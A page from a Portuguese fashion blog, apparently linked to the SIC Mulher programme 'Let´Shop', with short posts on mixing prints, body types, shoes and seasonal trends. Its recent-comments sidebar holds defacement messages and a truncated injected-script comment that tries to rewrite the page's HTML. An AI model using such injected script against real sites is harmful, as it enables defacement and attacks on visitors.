Let´Shop @ 18:34

Qua, 28/03/12

Existem algumas dicas infalíveis na criação de looks de sucesso com mistura de prints:
As cores são fundamentais e podem ser o ponto de partida na esco¬lha das peças. O objetivo é tentar encontrar uma cor que seja comum aos padrões que pretende usar. Ou seja, se num look misturarmos vários padrões que tenham a mesma palete de cores como base, diminuímos o impacto visual que cores diferentes causam, fazendo com que padrões diferentes se misturem mais facilmente.

O tipo de padrões a usar é, também, importante. A idéia é equilibrar prints edgy e maiores com outros mais simples e subtis. Por exem¬plo, mis¬tu¬rar apenas padrões geo-mé¬tri¬cos - ris¬cas e bolas. Este truque resulta sempre, se misturarmos padrões do mesmo tipo – prints animais, florais, geométricos – mesmo que sejam diferentes, combinam sempre.

Outra ideia é usar o mesmo padrão mas, com ângulos ou tamanhos diferentes. Por exemplo, usar riscas horizontais com riscas verticais na mesma cor.

Na nossa rubrica vamos mostrar exemplos de looks com mix de padrões que podem ser usados para trabalhar, para sair e para o fim de semana.


Tags:


Let´Shop @ 18:30

Qua, 07/03/12

Neste programa vamos falar sobre o estilo da mulher Sic Mulher:  

Uma mulher moderna, determinada, sensível, conhecedora, atraente e independente. No fundo todas as mulheres têm um pouco destas características."
 
 Escolhemos 4 mulheres famosas pelo seu estilo (e não só), pertencentes a 4 faixas etárias diferentes, para mostrarmos o estilo da mulher Sic Mulher. Trazemos várias sugestões pensadas para cada uma das idades o que não quer dizer que uma mulher de 20 anos não possa usar um conjunto de uma de 30 ou 40 anos, por exemplo. 


Tags:


Let´Shop @ 18:31

Qua, 01/02/12

Depois de uma semana de trabalho a última coisa que queremos ver, muitas vezes, são saltos altos, roupa apertada e qualquer coisa que não seja absolutamente confortável. Felizmente não é necessário usarmos fatos de treino com ténis e t-shirt para nos sentirmos muito confortáveis no fim de semana. É possível fazermos conjuntos muito confortáveis, práticos sem perdermos nada no nosso estilo. E se quisermos sair à noite depois de uma tarde em família é só mudar os sapatos, acessórios ou casaco e estamos prontas.

Vamos dar algumas sugestões de conjuntos para fim de semana, confortáveis e com estilo, e mostrar como podem ser facilmente adaptados para uma saída ao final do dia.


Tags:


Let´Shop @ 12:34

Qui, 12/01/12

Neste programa vamos falar sobre a transformação da Romi que é uma mulher petite – baixa e magra. Tem um corpo proporcionado. O objectivo para quem é petite é vestir-se de modo a parecer mais alta mantendo uma silhueta proporcionada e realçando os seus pontos fortes. No caso da Romi, ficam-lhe bem peças justas que mostram a zona da cintura que é estreita.

 


Tags:


Let´Shop @ 18:34

Qua, 30/11/11

Afinal, a que se deve esta preocupação com a moda/tendências para cada estação, senão o desejo/vontade de ter uma boa imagem?

Atendendo aos tempos que correm, esta preocupação, assim logo à 1ª, pode parecer uma enorme futilidade mas, é algo que dá trabalho no meio das mil e uma coisas que temos prioritariamente e diariamente que fazer e com que nos preocupar.

Para esta rubrica sugerimos às nossas telespectadoras que guardem no fim-de-semana algum tempo para deixar prontos em cabides os conjuntos da semana. Vamos sugerir várias hipóteses para esses conjuntos, mas este é um trabalho que a LETSHOP já faz todos os dias através do seu Blog Let’Style.

Que roupa é que visto amanhã? Quantas vezes não temos esta frase pequena, mas cheia de complexidades na nossa cabeça?



Tags:


Let´Shop @ 15:59

Qui, 03/11/11

Os sapatos são uma maneira segura de transformar um conjunto. Também são uma das obsessões de que não nos conseguimos livrar. Todas as estações têm algumas tendências que acabamos por seguir ou pelo menos considerar. Este Inverno não é excepção e há algumas sugestões que nos podem fazer sentir maravilhosas. Ao escolher devemo-nos sempre focar naquilo que gostamos e com que nos sentimos bem. Neste programa vamos falar de alguns dos sapatos mais icónicos desta estação: como as Litas from Jeffery Campbell, os Botins (pumps com estampado animal), Hunters, Botins de cunha (Wedge boots).


Tags:


Let´Shop @ 18:16

Qua, 12/10/11

Todos nascemos com uma determinada carga genética. Não existe um tipo de corpo ideal, existem vários. O corpo pode ter as formas de um triângulo, de um retângulo, oval parecer uma pêra ou mesmo uma maçã.

 

Mas há sempre uma roupa, uma cor e um tecido adequado a cada tipo de corpo.  Sabermos o nosso tipo de corpo e as linhas que caracterizam a nossa silhueta tem um efeito milagroso no nosso estilo. O segredo é sempre o mesmo: realçar as qualidades e o que temos de positivo.

 

Nesta rubrica falaremos sobre o tipo de corpo da Teresa Branco - triângulo invertido de estatura média/baixa.  Com este tipo de tema, pretendemos mostrar ao vivo como podemos valorizar os pontos positivos da Teresa, sendo mais fácil às pessoas identificarem-se com este tipo de corpo e aprenderem algumas dicas.

 


Tags:


Let´Shop @ 18:17

Qua, 07/09/11

Conhecer as tendências da próxima estação é crucial para poder “construir” o seu guarda-roupa e evoluir no seu estilo pessoal.

 

É claro que as tendências terão de ser adaptadas ao estilo de vida e ao corpo de cada pessoa, de modo a não criar uma imagem pouco natural e de fachada.

 

O estilo Anos 70 continua a ser um ponto alto das inspirações da moda para este Outono/Inverno, com cortes típicos da época – boca-de-sino e pantalonas. Dentro da época, existem dois estilos estéticos predominantes: os anos 70 boémios e os anos 70 de sofisticado glamour.

 

Por outro lado, o contraste de uma moda mais “rude” como o estilo biker e punk com um lado mais “soft” como as transparências, os plissados e as rendas.

 


Tags:


Let´Shop @ 19:04

Qua, 20/07/11

As férias aproximam-se e com elas surgem as dúvidas com que peças devemos encher a mala, de modo a transmitirmos um look chic, confortável e adequado.

 

Com a ajuda de algumas peças-chave e uma estratégia infalível conseguimos atingir o nosso objectivo.

 


Tags:


Let´Shop @ 19:12

Qua, 25/05/11

Uma das dúvidas mais comuns é como ter um estilo confortável e descontraido mas que ao mesmo tempo seja sofisticado e chic para usar em todo o tipo de situações - no dia-a-dia, fim-de-semana, como para trabalhar ou ir a uma festa. O estilo easy chic adapta-se bem a todas essas situações.

 

Existem peças que por si só imprimem um estilo chic ao conjunto. Quer seja pelo seu corte ou pela sua textura, a forma do seu cair no corpo de uma mulher atribui-lhe uma denominação muito desejada por todas nós – chic.

 


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO